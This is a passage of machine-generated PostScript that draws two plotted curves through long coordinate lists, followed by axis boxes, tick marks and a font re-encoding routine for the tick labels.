L +124.097 214.628 L +124.461 214.515 L +124.826 214.402 L +125.19 214.288 L +125.554 214.175 L +125.919 214.061 L +126.283 213.948 L +126.648 213.834 L +127.012 213.72 L +127.376 213.605 L +127.741 213.491 L +128.105 213.376 L +128.469 213.262 L +128.834 213.147 L +129.198 213.032 L +129.562 212.916 L +129.927 212.801 L +130.291 212.685 L +130.655 212.57 L +131.02 212.454 L +131.384 212.337 L +131.748 212.221 L +132.113 212.105 L +132.477 211.988 L +132.841 211.871 L +133.206 211.754 L +133.57 211.636 L +133.934 211.519 L +134.299 211.401 L +134.663 211.283 L +135.027 211.165 L +135.392 211.047 L +135.756 210.928 L +136.12 210.81 L +136.485 210.691 L +136.849 210.572 L +137.213 210.452 L +137.578 210.332 L +137.942 210.213 L +138.306 210.093 L +138.671 209.973 L +139.035 209.852 L +139.399 209.732 L +139.764 209.611 L +140.128 209.49 L +140.492 209.368 L +140.857 209.247 L +141.221 209.125 L +141.585 209.003 L +141.95 208.881 L +142.314 208.758 L +142.678 208.635 L +143.043 208.513 L +143.407 208.389 L +143.771 208.266 L +144.136 208.142 L +144.5 208.018 L +144.864 207.894 L +145.229 207.77 L +145.593 207.645 L +145.957 207.52 L +146.322 207.395 L +146.686 207.269 L +147.051 207.143 L +147.415 207.017 L +147.779 206.891 L +148.144 206.764 L +148.508 206.637 L +148.872 206.51 L +149.237 206.383 L +149.601 206.255 L +149.965 206.127 L +150.33 205.999 L +150.694 205.87 L +151.058 205.741 L +151.423 205.612 L +151.787 205.483 L +152.151 205.353 L +152.516 205.223 L +152.88 205.092 L +153.244 204.962 L +153.609 204.831 L +153.973 204.699 L +154.337 204.567 L +154.702 204.435 L +155.066 204.303 L +155.43 204.17 L +155.795 204.037 L +156.159 203.904 L +156.523 203.77 L +156.888 203.636 L +157.252 203.502 L +157.616 203.367 L +157.981 203.232 L +158.345 203.096 L +158.709 202.961 L +159.074 202.824 L +159.438 202.688 L +159.802 202.551 L +160.167 202.414 L +160.531 202.276 L +160.895 202.138 L +161.26 201.999 L +161.624 201.86 L +161.988 201.721 L +162.353 201.581 L +162.717 201.441 L +163.081 201.301 L +163.446 201.16 L +163.81 201.018 L +164.174 200.877 L +164.539 200.735 L +164.903 200.592 L +165.267 200.449 L +165.632 200.305 L +165.996 200.161 L +166.36 200.017 L +166.725 199.872 L +167.089 199.727 L +167.454 199.581 L +167.818 199.435 L +168.182 199.288 L +168.547 199.141 L +168.911 198.993 L +169.275 198.845 L +169.64 198.696 L +170.004 198.547 L +170.368 198.397 L +170.733 198.247 L +171.097 198.097 L +171.461 197.945 L +171.826 197.793 L +172.19 197.641 L +172.554 197.488 L +172.919 197.335 L +173.283 197.181 L +173.647 197.026 L +174.012 196.871 L +174.376 196.716 L +174.74 196.559 L +175.105 196.403 L +175.469 196.245 L +175.833 196.087 L +176.198 195.929 L +176.562 195.77 L +176.926 195.61 L +177.291 195.449 L +177.655 195.288 L +178.019 195.126 L +178.384 194.964 L +178.748 194.801 L +179.112 194.637 L +179.477 194.473 L +179.841 194.308 L +180.205 194.142 L +180.57 193.976 L +180.934 193.809 L +181.298 193.641 L +181.663 193.472 L +182.027 193.304 L +182.391 193.134 L +182.756 192.963 L +183.12 192.791 L +183.484 192.62 L +183.849 192.447 L +184.213 192.273 L +184.577 192.098 L +184.942 191.923 L +185.306 191.747 L +185.67 191.57 L +186.035 191.392 L +186.399 191.214 L +186.763 191.035 L +187.128 190.854 L +187.492 190.673 L +187.856 190.491 L +188.221 190.309 L +188.585 190.125 L +188.95 189.94 L +189.314 189.755 L +189.678 189.568 L +190.043 189.381 L +190.407 189.192 L +190.771 189.003 L +191.136 188.813 L +191.5 188.622 L +191.864 188.429 L +192.229 188.236 L +192.593 188.042 L +192.957 187.847 L +193.322 187.65 L +193.686 187.453 L +194.05 187.254 L +194.415 187.054 L +194.779 186.854 L +195.143 186.652 L +195.508 186.449 L +195.872 186.244 L +196.236 186.039 L +196.601 185.832 L +196.965 185.625 L +197.329 185.415 L +197.694 185.205 L +198.058 184.994 L +198.422 184.781 L +198.787 184.567 L +199.151 184.351 L +199.515 184.134 L +199.88 131.817 L +200.244 131.597 L +200.608 131.376 L +200.973 131.153 L +201.337 130.93 L +201.701 130.704 L +202.066 130.477 L +202.43 130.249 L +202.794 130.019 L +203.159 129.787 L +203.523 129.554 L +203.887 129.318 L +204.252 129.082 L +204.616 128.844 L +204.98 128.604 L +205.345 128.362 L +205.709 128.118 L +206.073 127.873 L +206.438 127.625 L +206.802 127.376 L +207.166 127.125 L +207.531 126.872 L +207.895 126.616 L +208.259 126.358 L +208.624 126.099 L +208.988 125.837 L +209.353 125.573 L +209.717 125.307 L +210.081 125.038 L +210.446 124.767 L +210.81 124.494 L +211.174 124.217 L +211.539 123.939 L +211.903 123.657 L +212.267 123.373 L +212.632 123.086 L +212.996 122.797 L +213.36 122.504 L +213.725 122.208 L +214.089 121.91 L +214.453 121.608 L +214.818 121.302 L +215.182 120.994 L +215.546 120.681 L +215.911 120.366 L +216.275 120.046 L +216.639 119.723 L +217.004 119.395 L +217.368 119.064 L +217.732 118.728 L +218.097 118.389 L +218.461 118.044 L +218.825 117.695 L +219.19 117.34 L +219.554 116.982 L +219.918 116.617 L +220.283 116.248 L +220.647 115.872 L +221.011 115.491 L +221.376 115.103 L +221.74 114.71 L +222.104 114.31 L +222.469 113.903 L +222.833 113.488 L +223.197 113.067 L +223.562 112.637 L +223.926 112.199 L +224.29 111.753 L +224.655 111.297 L +225.019 110.833 L +225.383 110.358 L +225.748 109.874 L +226.112 109.378 L +226.476 108.871 L +226.841 108.353 L +227.205 107.821 L +227.569 107.276 L +227.934 106.717 L +228.298 106.144 L +228.662 105.556 L +229.027 104.951 L +229.391 104.329 L +229.756 103.689 L +230.12 103.031 L +230.484 102.352 L +230.849 101.653 L +231.213 100.932 L +231.577 100.19 L +231.942 99.426 L +232.306 98.638 L +232.67 97.827 L +233.035 96.995 L +233.399 96.143 L +233.763 95.275 L +234.128 94.395 L +234.492 93.515 L +234.856 92.647 L +235.221 91.816 L +235.585 91.055 L +235.949 90.419 L +236.314 89.987 L +236.678 89.872 L +237.042 90.228 L +237.407 91.227 L +237.771 93.008 L +238.135 95.595 L +238.5 98.813 L +238.864 102.357 L +239.228 105.928 L +239.593 109.305 L +239.957 112.388 L +240.321 115.15 L +240.686 117.611 L +241.05 119.793 L +241.414 121.734 L +241.779 123.473 L +242.143 125.035 L +242.507 126.442 L +242.872 127.722 L +243.236 128.889 L +243.6 129.959 L +243.965 130.941 L +244.329 131.852 L +244.693 132.693 L +245.058 133.477 L +245.422 134.21 L +245.786 134.895 L +246.151 135.537 L +246.515 136.14 L +246.879 136.711 L +247.244 137.249 L +247.608 137.759 L +247.972 138.243 L +248.337 138.702 L +248.701 139.14 L +249.065 139.557 L +249.43 139.955 L +249.794 140.335 L +250.159 140.699 L +250.523 141.048 L +250.887 141.382 L +251.252 141.704 L +251.616 142.013 L +251.98 142.31 L +252.345 142.596 L +252.709 142.871 L +253.073 143.138 L +253.438 143.394 L +253.802 143.643 L +254.166 143.882 L +254.531 144.115 L +254.895 144.339 L +255.259 144.557 L +255.624 144.768 L +255.988 144.972 L +256.352 145.171 L +256.717 145.364 L +257.081 145.551 L +257.445 145.733 L +257.81 145.91 L +258.174 146.082 L +258.538 146.25 L +258.903 146.413 L +259.267 146.572 L +259.631 146.727 L +259.996 146.878 L +260.36 147.025 L +260.724 147.169 L +261.089 147.309 L +261.453 147.446 L +261.817 147.579 L +262.182 147.71 L +262.546 147.837 L +262.91 147.962 L +263.275 148.084 L +263.639 148.203 L +264.003 148.32 L +264.368 148.434 L +264.732 148.546 L +265.096 148.655 L +265.461 148.763 L +265.825 148.868 L +266.189 148.97 L +266.554 149.071 L +266.918 149.17 L +267.282 149.267 L +267.647 149.362 L +268.011 149.455 L +268.375 149.547 L +268.74 149.636 L +269.104 149.724 L +269.468 149.811 L +269.833 149.896 L +270.197 149.979 L +270.561 150.061 L +270.926 150.141 L +271.29 150.22 L +271.655 150.298 L +272.019 150.374 L +272.383 150.449 L +272.748 150.523 L +273.112 150.595 L +273.476 150.667 L +273.841 150.737 L +274.205 150.806 L +274.569 150.874 L +274.934 150.941 L +275.298 151.006 L +275.662 151.071 L +276.027 151.135 L +276.391 151.198 L +276.755 151.259 L +277.12 151.32 L +277.484 151.38 L +277.848 151.439 L +278.213 151.497 L +278.577 151.554 L +278.941 151.611 L +279.306 151.666 L +279.67 151.721 L +280.034 151.775 L +280.399 151.828 L +280.763 151.881 L +281.127 151.932 L +281.492 151.983 L +281.856 152.034 L +282.22 152.083 L +282.585 152.132 L +282.949 152.181 L +283.313 152.228 L +283.678 152.275 L +284.042 152.321 L +284.406 152.367 L +284.771 152.412 L +285.135 152.457 L +285.499 152.501 L +285.864 152.544 L +286.228 152.587 L +286.592 152.63 L +286.957 152.671 L +287.321 152.713 L +287.685 152.753 L +288.05 152.794 L +288.414 152.833 L +288.778 152.872 L +289.143 152.911 L +289.507 152.949 L +289.871 152.987 L +290.236 153.025 L +290.6 153.062 L +290.964 153.098 L +291.329 153.134 L +291.693 153.17 L +292.058 153.205 L +292.422 153.24 L +292.786 153.274 L +293.151 153.308 L +293.515 153.342 L +293.879 153.375 L +294.244 153.408 L +294.608 153.44 L +294.972 153.473 L +295.337 153.504 L +295.701 153.536 L +296.065 153.567 L +296.43 153.597 L +296.794 153.628 L +297.158 153.658 L +297.523 153.688 L +297.887 153.717 L +298.251 153.746 L +298.616 153.775 L +298.98 153.803 L +299.344 153.832 L +299.709 153.86 L +300.073 153.887 L +300.437 153.914 L +300.802 153.941 L +301.166 153.968 L +301.53 153.995 L +301.895 154.021 L +302.259 154.047 L +302.623 154.072 L +302.988 154.098 L +303.352 154.123 L +303.716 154.148 L +304.081 154.173 L +304.445 154.197 L +304.809 154.221 L +305.174 154.245 L +305.538 154.269 L +305.902 154.292 L +306.267 154.315 L +306.631 154.338 L +306.995 154.361 L +307.36 154.384 L +307.724 154.406 L +308.088 154.428 L +308.453 154.45 L +308.817 154.472 L +309.181 154.493 L +309.546 154.515 L +309.91 154.536 L +310.274 154.557 L +310.639 154.578 L +311.003 154.598 L +311.367 154.618 L +311.732 154.639 L +312.096 154.659 L +312.461 154.678 L +312.825 154.698 L +313.189 154.717 L +313.554 154.737 L +313.918 154.756 L +314.282 154.775 L +314.647 154.793 L +315.011 154.812 L +315.375 154.83 L +315.74 154.849 L +316.104 154.867 L +316.468 154.885 L +316.833 154.902 L +317.197 154.92 L +317.561 154.938 L +317.926 154.955 L +318.29 154.972 L +318.654 154.989 L +319.019 155.006 L +319.383 155.023 L +319.747 155.039 L +320.112 155.056 L +320.476 155.072 L +320.84 155.088 L +321.205 155.104 L +321.569 155.12 L +321.933 155.136 L +322.298 155.152 L +322.662 155.167 L +323.026 155.183 L +323.391 155.198 L +323.755 155.213 L +324.119 155.228 L +324.484 155.243 L +324.848 155.258 L +325.212 155.272 L +325.577 155.287 L +325.941 155.301 L +326.305 155.316 L +326.67 155.33 L +327.034 155.344 L +327.398 155.358 L +327.763 155.372 L +328.127 155.386 L +328.491 155.399 L +328.856 155.413 L +329.22 155.426 L +329.584 155.439 L +329.949 155.453 L +330.313 155.466 L +330.677 155.479 L +331.042 155.492 L +331.406 155.505 L +331.77 155.517 L +332.135 155.53 L +332.499 155.542 L +332.864 155.555 L +333.228 155.567 L +333.592 155.579 L +333.957 155.592 L +334.321 155.604 L +334.685 155.616 L +335.05 155.628 L +335.414 155.639 L +335.778 155.651 L +336.143 155.663 L +336.507 155.674 L +336.871 155.686 L +337.236 155.697 L +337.6 155.708 L +337.964 155.719 L +338.329 155.731 L +338.693 155.742 L +339.057 155.753 L +339.422 155.763 L +339.786 155.774 L +340.15 155.785 L +340.515 155.796 L +340.879 155.806 L +341.243 155.817 L +341.608 155.827 L +341.972 155.838 L +342.336 155.848 L +342.701 155.858 L +343.065 155.868 L +343.429 155.878 L +343.794 155.888 L +344.158 155.898 L +344.522 155.908 L +344.887 155.918 L +345.251 155.927 L +345.615 155.937 L +345.98 155.947 L +346.344 155.956 L +346.708 155.966 L +347.073 155.975 L +347.437 155.984 L +347.801 155.994 L +348.166 156.003 L +348.53 156.012 L +348.894 156.021 L +349.259 156.03 L +349.623 156.039 L +349.987 156.048 L +350.352 156.057 L +350.716 156.065 L +351.08 156.074 L +351.445 156.083 L +351.809 156.091 L +352.173 156.1 L +352.538 156.108 L +352.902 156.117 L +353.266 156.125 L +353.631 156.133 L +353.995 156.142 L +354.36 156.15 L +354.724 156.158 L +355.088 156.166 L +355.453 156.174 L +355.817 156.182 L +356.181 156.19 L +356.546 156.198 L +356.91 156.206 L +357.274 156.214 L +357.639 156.221 L +358.003 156.229 L +358.367 156.237 L +358.732 156.244 L +359.096 156.252 L +359.46 156.259 L +359.825 156.267 L +360.189 156.274 L +360.553 156.282 L +360.918 156.289 L +361.282 156.296 L +361.646 156.303 L +362.011 156.311 L +362.375 156.318 L +362.739 156.325 L +363.104 156.332 L +363.468 156.339 L +363.832 156.346 L +364.197 156.353 L +364.561 156.36 L +364.925 156.366 L +365.29 156.373 L +365.654 156.38 L +366.018 156.387 L +366.383 156.393 L +366.747 156.4 L +367.111 156.407 L +367.476 156.413 L +367.84 156.42 L +368.204 156.426 L +368.569 156.433 L +368.933 156.439 L +369.297 156.445 L +369.662 156.452 L +370.026 156.458 L +370.39 156.464 L +370.755 156.47 L +371.119 156.476 L +371.483 156.483 L +371.848 156.489 L +372.212 156.495 L +372.576 156.501 L +372.941 156.507 L +373.305 156.513 L +373.669 156.519 L +374.034 156.524 L +374.398 156.53 L +374.763 156.536 L +375.127 156.542 L +375.491 156.548 L +375.856 156.553 L +376.22 156.559 L +376.584 156.565 L +376.949 156.57 L +377.313 156.576 L +377.677 156.581 L +378.042 156.587 L +378.406 156.592 L +378.77 156.598 L +379.135 156.603 L +379.499 156.609 L +379.863 156.614 L +380.228 156.619 L +380.592 156.625 L +380.956 156.63 L +381.321 156.635 L +381.685 156.64 L +382.049 156.646 L +382.414 156.651 L +382.778 156.656 L +383.142 156.661 L +383.507 156.666 L +383.871 156.671 L +384.235 156.676 L +384.6 156.681 L +384.964 156.686 L +385.328 156.691 L +385.693 156.696 L +386.057 156.701 L +386.421 156.706 L +386.786 156.71 L +387.15 156.715 L +387.514 156.72 L +387.879 156.725 L +388.243 156.729 L +388.607 156.734 L +388.972 156.739 L +389.336 156.743 L +389.7 156.748 L +390.065 156.753 L +390.429 156.757 L +390.793 156.762 L +391.158 156.766 L +391.522 156.771 L +391.886 156.775 L +392.251 156.78 L +392.615 156.784 L +392.979 156.788 L +393.344 156.793 L +393.708 156.797 L +394.072 156.802 L +394.437 156.806 L +394.801 156.81 L +395.166 156.814 L +395.53 156.819 L +395.894 156.823 L +396.259 156.827 L +396.623 156.831 L +396.987 156.835 L +397.352 156.84 L +397.716 156.844 L +398.08 156.848 L +398.445 156.852 L +398.809 156.856 L +399.173 156.86 L +399.538 156.864 L +399.902 156.868 L +400.266 156.872 L +400.631 156.876 L +400.995 156.88 L +401.359 156.884 L +401.724 156.887 L +402.088 156.891 L +402.452 156.895 L +402.817 156.899 L +403.181 156.903 L +403.545 156.907 L +403.91 156.91 L +404.274 156.914 L +404.638 156.918 L +405.003 156.921 L +405.367 156.925 L +405.731 156.929 L +406.096 156.933 L +406.46 156.936 L +406.824 156.94 L +407.189 156.943 L +407.553 156.947 L +407.917 156.95 L +408.282 156.954 L +408.646 156.958 L +409.01 156.961 L +409.375 156.965 L +409.739 156.968 L +410.103 156.972 L +410.468 156.975 L +410.832 156.978 L +411.196 156.982 L +411.561 156.985 L +411.925 156.989 L +412.289 156.992 L +412.654 156.995 L +413.018 156.999 L +413.382 157.002 L +413.747 157.005 L +414.111 157.008 L +414.475 157.012 L +414.84 157.015 L +415.204 157.018 L +415.568 157.021 L +415.933 157.025 L +416.297 157.028 L +416.662 157.031 L +417.026 157.034 L +417.39 157.037 L +417.755 157.04 L +418.119 157.043 L +418.483 157.047 L +418.848 157.05 L +419.212 157.053 L +419.576 157.056 L +419.941 157.059 L +420.305 157.062 L +420.669 157.065 L +421.034 157.068 L +421.398 157.071 L +421.762 157.074 L +422.127 157.077 L +422.491 157.08 L +422.855 157.083 L +423.22 157.085 L +423.584 157.088 L +423.948 157.091 L +424.313 157.094 L +424.677 157.097 L +425.041 157.1 L +425.406 157.103 L +425.77 157.105 L +426.134 157.108 L +426.499 157.111 L +426.863 157.114 L +427.227 157.117 L +427.592 157.119 L +427.956 157.122 L +428.32 157.125 L +428.685 157.127 L +429.049 157.13 L +429.413 157.133 L +429.778 157.136 L +430.142 157.138 L +430.506 157.141 L +430.871 157.143 L +431.235 157.146 L +431.599 157.149 L +431.964 157.151 L +432.328 157.154 L +432.692 157.156 L +433.057 157.159 L +433.421 157.162 L +433.785 157.164 L +434.15 157.167 L +434.514 157.169 L +434.878 157.172 L +435.243 157.174 L +435.607 157.177 L +435.971 157.179 L +436.336 157.182 L +436.7 157.184 L +437.065 157.187 L +437.429 157.189 L +437.793 157.191 L +438.158 157.194 L +438.522 157.196 L +438.886 157.199 L +439.251 157.201 L +439.615 157.203 L +439.979 157.206 L +440.344 157.208 L +440.708 157.21 L +441.072 157.213 L +441.437 157.215 L +441.801 157.217 L +442.165 157.22 L +442.53 157.222 L +s +78.19 230.21 m +78.919 229.983 L +79.648 229.756 L +80.376 229.529 L +81.105 229.302 L +81.834 229.074 L +82.562 228.847 L +83.291 228.619 L +84.02 228.391 L +84.749 228.163 L +85.477 227.935 L +86.206 227.707 L +86.935 227.479 L +87.663 227.251 L +88.392 227.023 L +89.121 226.795 L +89.849 226.567 L +90.578 226.339 L +91.307 226.111 L +92.035 225.884 L +92.764 225.656 L +93.493 225.429 L +94.221 225.201 L +94.95 224.974 L +95.679 224.747 L +96.407 224.52 L +97.136 224.294 L +97.865 224.067 L +98.593 223.841 L +99.322 223.615 L +100.051 223.39 L +100.779 223.164 L +101.508 222.939 L +102.237 222.714 L +102.965 222.49 L +103.694 222.266 L +104.423 222.042 L +105.152 221.819 L +105.88 221.596 L +106.609 221.373 L +107.338 221.151 L +108.066 220.929 L +108.795 220.707 L +109.524 220.486 L +110.252 220.265 L +110.981 220.045 L +111.71 219.825 L +112.438 219.606 L +113.167 219.387 L +113.896 219.169 L +114.624 218.951 L +115.353 218.733 L +116.082 218.517 L +116.81 218.3 L +117.539 218.085 L +118.268 217.869 L +118.996 217.655 L +119.725 217.44 L +120.454 217.227 L +121.182 217.014 L +121.911 216.801 L +122.64 216.59 L +123.368 216.378 L +124.097 216.168 L +124.826 215.958 L +125.554 215.748 L +126.283 215.539 L +127.012 163.232 L +127.741 163.025 L +128.469 162.818 L +129.198 162.612 L +129.927 162.406 L +130.655 162.201 L +131.384 161.997 L +132.113 161.794 L +132.841 161.591 L +133.57 161.39 L +134.299 161.188 L +135.027 160.988 L +135.756 160.789 L +136.485 160.59 L +137.213 160.392 L +137.942 160.194 L +138.671 159.998 L +139.399 159.803 L +140.128 159.608 L +140.857 159.414 L +141.585 159.221 L +142.314 159.029 L +143.043 158.839 L +143.771 158.648 L +144.5 158.459 L +145.229 158.271 L +145.957 158.084 L +146.686 157.898 L +147.415 157.714 L +148.144 157.53 L +148.872 157.347 L +149.601 157.166 L +150.33 156.985 L +151.058 156.806 L +151.787 156.628 L +152.516 156.452 L +153.244 156.277 L +153.973 156.103 L +154.702 155.931 L +155.43 155.761 L +156.159 155.591 L +156.888 155.424 L +157.616 155.258 L +158.345 155.094 L +159.074 154.931 L +159.802 154.771 L +160.531 154.612 L +161.26 154.455 L +161.988 154.3 L +162.717 154.148 L +163.446 153.997 L +164.174 153.849 L +164.903 153.703 L +165.632 153.56 L +166.36 153.419 L +167.089 153.28 L +167.818 153.145 L +168.547 153.012 L +169.275 152.882 L +170.004 152.754 L +170.733 152.631 L +171.461 152.51 L +172.19 152.392 L +172.919 152.278 L +173.647 152.167 L +174.376 152.06 L +175.105 151.956 L +175.833 151.856 L +176.562 151.76 L +177.291 151.668 L +178.019 151.58 L +178.748 151.497 L +179.477 151.417 L +180.205 151.342 L +180.934 151.271 L +181.663 151.205 L +182.391 151.143 L +183.12 151.086 L +183.849 151.033 L +184.577 150.985 L +185.306 150.942 L +186.035 150.904 L +186.763 150.87 L +187.492 150.841 L +188.221 150.817 L +188.95 150.797 L +189.678 150.783 L +190.407 150.773 L +191.136 150.767 L +191.864 150.766 L +192.593 150.77 L +193.322 150.778 L +194.05 150.79 L +194.779 150.806 L +195.508 150.827 L +196.236 150.851 L +196.965 150.88 L +197.694 150.911 L +198.422 150.947 L +199.151 150.986 L +199.88 151.028 L +200.608 151.073 L +201.337 151.121 L +202.066 151.172 L +202.794 151.225 L +203.523 151.281 L +204.252 151.339 L +204.98 151.398 L +205.709 151.46 L +206.438 151.524 L +207.166 151.589 L +207.895 151.656 L +208.624 151.723 L +209.353 151.792 L +210.081 151.862 L +210.81 151.933 L +211.539 152.005 L +212.267 152.077 L +212.996 152.149 L +213.725 152.222 L +214.453 152.295 L +215.182 152.368 L +215.911 152.441 L +216.639 152.515 L +217.368 152.588 L +218.097 152.661 L +218.825 152.733 L +219.554 152.806 L +220.283 152.877 L +221.011 152.949 L +221.74 153.019 L +222.469 153.09 L +223.197 153.159 L +223.926 153.228 L +224.655 153.296 L +225.383 153.364 L +226.112 153.431 L +226.841 153.497 L +227.569 153.562 L +228.298 153.626 L +229.027 153.69 L +229.756 153.753 L +230.484 153.815 L +231.213 153.876 L +231.942 153.936 L +232.67 153.995 L +233.399 154.053 L +234.128 154.111 L +234.856 154.167 L +235.585 154.223 L +236.314 154.278 L +237.042 154.332 L +237.771 154.385 L +238.5 154.437 L +239.228 154.488 L +239.957 154.539 L +240.686 154.589 L +241.414 154.637 L +242.143 154.685 L +242.872 154.733 L +243.6 154.779 L +244.329 154.824 L +245.058 154.869 L +245.786 154.913 L +246.515 154.957 L +247.244 154.999 L +247.972 155.041 L +248.701 155.082 L +249.43 155.122 L +250.159 155.162 L +250.887 155.201 L +251.616 155.239 L +252.345 155.276 L +253.073 155.313 L +253.802 155.35 L +254.531 155.385 L +255.259 155.42 L +255.988 155.455 L +256.717 155.488 L +257.445 155.521 L +258.174 155.554 L +258.903 155.586 L +259.631 155.618 L +260.36 155.648 L +261.089 155.679 L +261.817 155.709 L +262.546 155.738 L +263.275 155.767 L +264.003 155.795 L +264.732 155.823 L +265.461 155.85 L +266.189 155.877 L +266.918 155.904 L +267.647 155.93 L +268.375 155.955 L +269.104 155.98 L +269.833 156.005 L +270.561 156.029 L +271.29 156.053 L +272.019 156.077 L +272.748 156.1 L +273.476 156.122 L +274.205 156.145 L +274.934 156.167 L +275.662 156.188 L +276.391 156.209 L +277.12 156.23 L +277.848 156.251 L +278.577 156.271 L +279.306 156.291 L +280.034 156.31 L +280.763 156.33 L +281.492 156.349 L +282.22 156.367 L +282.949 156.385 L +283.678 156.404 L +284.406 156.421 L +285.135 156.439 L +285.864 156.456 L +286.592 156.473 L +287.321 156.49 L +288.05 156.506 L +288.778 156.522 L +289.507 156.538 L +290.236 156.554 L +290.964 156.569 L +291.693 156.584 L +292.422 156.599 L +293.151 156.614 L +293.879 156.628 L +294.608 156.643 L +295.337 156.657 L +296.065 156.671 L +296.794 156.684 L +297.523 156.698 L +298.251 156.711 L +298.98 156.724 L +299.709 156.737 L +300.437 156.75 L +301.166 156.762 L +301.895 156.774 L +302.623 156.787 L +303.352 156.799 L +304.081 156.81 L +304.809 156.822 L +305.538 156.833 L +306.267 156.845 L +306.995 156.856 L +307.724 156.867 L +308.453 156.878 L +309.181 156.888 L +309.91 156.899 L +310.639 156.909 L +311.367 156.92 L +312.096 156.93 L +312.825 156.94 L +313.554 156.949 L +314.282 156.959 L +315.011 156.969 L +315.74 156.978 L +316.468 156.988 L +317.197 156.997 L +317.926 157.006 L +318.654 157.015 L +319.383 157.024 L +320.112 157.032 L +320.84 157.041 L +321.569 157.049 L +322.298 157.058 L +323.026 157.066 L +323.755 157.074 L +324.484 157.082 L +325.212 157.09 L +325.941 157.098 L +326.67 157.106 L +327.398 157.113 L +328.127 157.121 L +328.856 157.128 L +329.584 157.136 L +330.313 157.143 L +331.042 157.15 L +331.77 157.157 L +332.499 157.164 L +333.228 157.171 L +333.957 157.178 L +334.685 157.185 L +335.414 157.192 L +336.143 157.198 L +336.871 157.205 L +337.6 157.211 L +338.329 157.217 L +339.057 157.224 L +339.786 157.23 L +340.515 157.236 L +341.243 157.242 L +341.972 157.248 L +342.701 157.254 L +343.429 157.26 L +344.158 157.266 L +344.887 157.271 L +345.615 157.277 L +346.344 157.283 L +347.073 157.288 L +347.801 157.294 L +348.53 157.299 L +349.259 157.304 L +349.987 157.31 L +350.716 157.315 L +351.445 157.32 L +352.173 157.325 L +352.902 157.33 L +353.631 157.335 L +354.36 157.34 L +355.088 157.345 L +355.817 157.35 L +356.546 157.354 L +357.274 157.359 L +358.003 157.364 L +358.732 157.368 L +359.46 157.373 L +360.189 157.377 L +360.918 157.382 L +361.646 157.386 L +362.375 157.391 L +363.104 157.395 L +363.832 157.399 L +364.561 157.403 L +365.29 157.408 L +366.018 157.412 L +366.747 157.416 L +367.476 157.42 L +368.204 157.424 L +368.933 157.428 L +369.662 157.432 L +370.39 157.436 L +371.119 157.439 L +371.848 157.443 L +372.576 157.447 L +373.305 157.451 L +374.034 157.454 L +374.763 157.458 L +375.491 157.462 L +376.22 157.465 L +376.949 157.469 L +377.677 157.472 L +378.406 157.476 L +379.135 157.479 L +379.863 157.482 L +380.592 157.486 L +381.321 157.489 L +382.049 157.492 L +382.778 157.496 L +383.507 157.499 L +384.235 157.502 L +384.964 157.505 L +385.693 157.508 L +386.421 157.512 L +387.15 157.515 L +387.879 157.518 L +388.607 157.521 L +389.336 157.524 L +390.065 157.527 L +390.793 157.53 L +391.522 157.532 L +392.251 157.535 L +392.979 157.538 L +393.708 157.541 L +394.437 157.544 L +395.166 157.547 L +395.894 157.549 L +396.623 157.552 L +397.352 157.555 L +398.08 157.557 L +398.809 157.56 L +399.538 157.563 L +400.266 157.565 L +400.995 157.568 L +401.724 157.57 L +402.452 157.573 L +403.181 157.575 L +403.91 157.578 L +404.638 157.58 L +405.367 157.583 L +406.096 157.585 L +406.824 157.587 L +407.553 157.59 L +408.282 157.592 L +409.01 157.594 L +409.739 157.597 L +410.468 157.599 L +411.196 157.601 L +411.925 157.603 L +412.654 157.606 L +413.382 157.608 L +414.111 157.61 L +414.84 157.612 L +415.568 157.614 L +416.297 157.616 L +417.026 157.619 L +417.755 157.621 L +418.483 157.623 L +419.212 157.625 L +419.941 157.627 L +420.669 157.629 L +421.398 157.631 L +422.127 157.633 L +422.855 157.635 L +423.584 157.637 L +424.313 157.639 L +425.041 157.64 L +425.77 157.642 L +426.499 157.644 L +427.227 157.646 L +427.956 157.648 L +428.685 157.65 L +429.413 157.652 L +430.142 157.653 L +430.871 157.655 L +431.599 157.657 L +432.328 157.659 L +433.057 157.66 L +433.785 157.662 L +434.514 157.664 L +435.243 157.666 L +435.971 157.667 L +436.7 157.669 L +437.429 157.671 L +438.158 157.672 L +438.886 157.674 L +439.615 157.675 L +440.344 157.677 L +441.072 157.679 L +441.801 157.68 L +442.53 157.682 L +s +P +0 g +0.144 w +[ ] 0 setdash +3.25 setmiterlimit +450.12 237.508 m +70.6 237.508 L +s +70.6 237.508 m +70.6 2.952 L +s +1 g +[ ] 0 setdash +70.6 2.952 m +450.12 2.952 L +s +450.12 2.952 m +450.12 237.508 L +s +0 g +[ ] 0 setdash +p +0 setlinecap +78.19 237.508 m +78.19 234.611 L +s +P +p +np 74 239 m +74 253 L +82 253 L +82 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 75.19 239.668 ] concat +1 w +[ ] 0 setdash +p +np -2.19 -1.668 m +-2.19 14.332 L +7.81 14.332 L +7.81 -1.668 L +cp +clip np +/MISOfy +{ + /newfontname exch def + /oldfontname exch def + oldfontname findfont + dup length dict begin + {1 index/FID ne{def}{pop pop}ifelse}forall + /Encoding ISOLatin1Encoding def + currentdict + end + newfontname exch definefont pop +}def +%%IncludeResource: font Times-Roman +%%IncludeFont: Times-Roman +%%BeginResource: font Times-Roman-MISO +%%BeginFont: Times-Roman-MISO +/Times-Roman /Times-Roman-MISO MISOfy +%%EndFont +%%EndResource +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(0) N +P +[1 0 0 1 -75.19 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +92.764 237.508 m +92.764 235.77 L +s +P +p +0 setlinecap +107.338 237.508 m +107.338 235.77 L +s +P +p +0 setlinecap +121.911 237.508 m +121.911 235.77 L +s +P +p +0 setlinecap +136.485 237.508 m +136.485 235.77 L +s +P +p +0 setlinecap +151.058 237.508 m +151.058 234.611 L +s +P +p +np 147 239 m +147 253 L +155 253 L +155 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 148.058 239.668 ] concat +1 w +[ ] 0 setdash +p +np -2.058 -1.668 m +-2.058 14.332 L +7.942 14.332 L +7.942 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(1) N +P +[1 0 0 1 -148.058 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +165.632 237.508 m +165.632 235.77 L +s +P +p +0 